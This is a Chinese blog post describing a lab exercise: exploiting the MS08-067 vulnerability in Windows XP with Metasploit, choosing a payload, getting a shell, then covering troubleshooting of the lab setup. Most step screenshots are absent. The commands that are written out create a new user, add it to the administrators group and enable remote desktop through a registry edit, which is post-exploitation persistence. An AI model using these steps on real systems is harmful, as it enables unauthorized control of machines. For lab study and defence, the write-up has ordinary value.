利用ms08-067漏洞远程控制Windowsxp

1、查找ms08-067:

2、使用:

3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)

4、查看options(yes为必填部分):

5、输入RHOST(目标靶机)IP和LHOST的IP:

6、查看适合的系统类型(简体中文sp3,编号34):

7、可选target 0(自动)或自己选择:

8、exploit(图中IP是后来改的,原先是192.168.199.139)(问号是因为中、英文编码不通?所以攻击机命令靶机也无法正常获得执行):

9、获得靶机cmd:shell

10、查看端口打开情况:

11、新建用户: net user 用户名 密码 /add

12、将新用户添加到administation分组(提升到管理员权限):net localgroup administrators 用户名  /add

13、开启3389端口:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

14、局域网内用户都可远程控制此靶机:mstsc

15、问题总结:

   首先,靶机的安装遇到了一些难题:windowsxp有的版本已经打过补丁,我尝试过找旧版本和卸载补丁,没成功,百度的方法不适应。最后发现之前安装的xp满足要求,是因为联网的问题导致的失败;

   联网问题:NAT模式自动获取IP(开启dhcp服务),桥接模式手动配IP。进行期间断网或者更换联网方式,应当对IP进行查看修改。

   还有一个问题,打开的Windows shell不能使用上下左右键

 

 

 

  • 7
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xyx107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值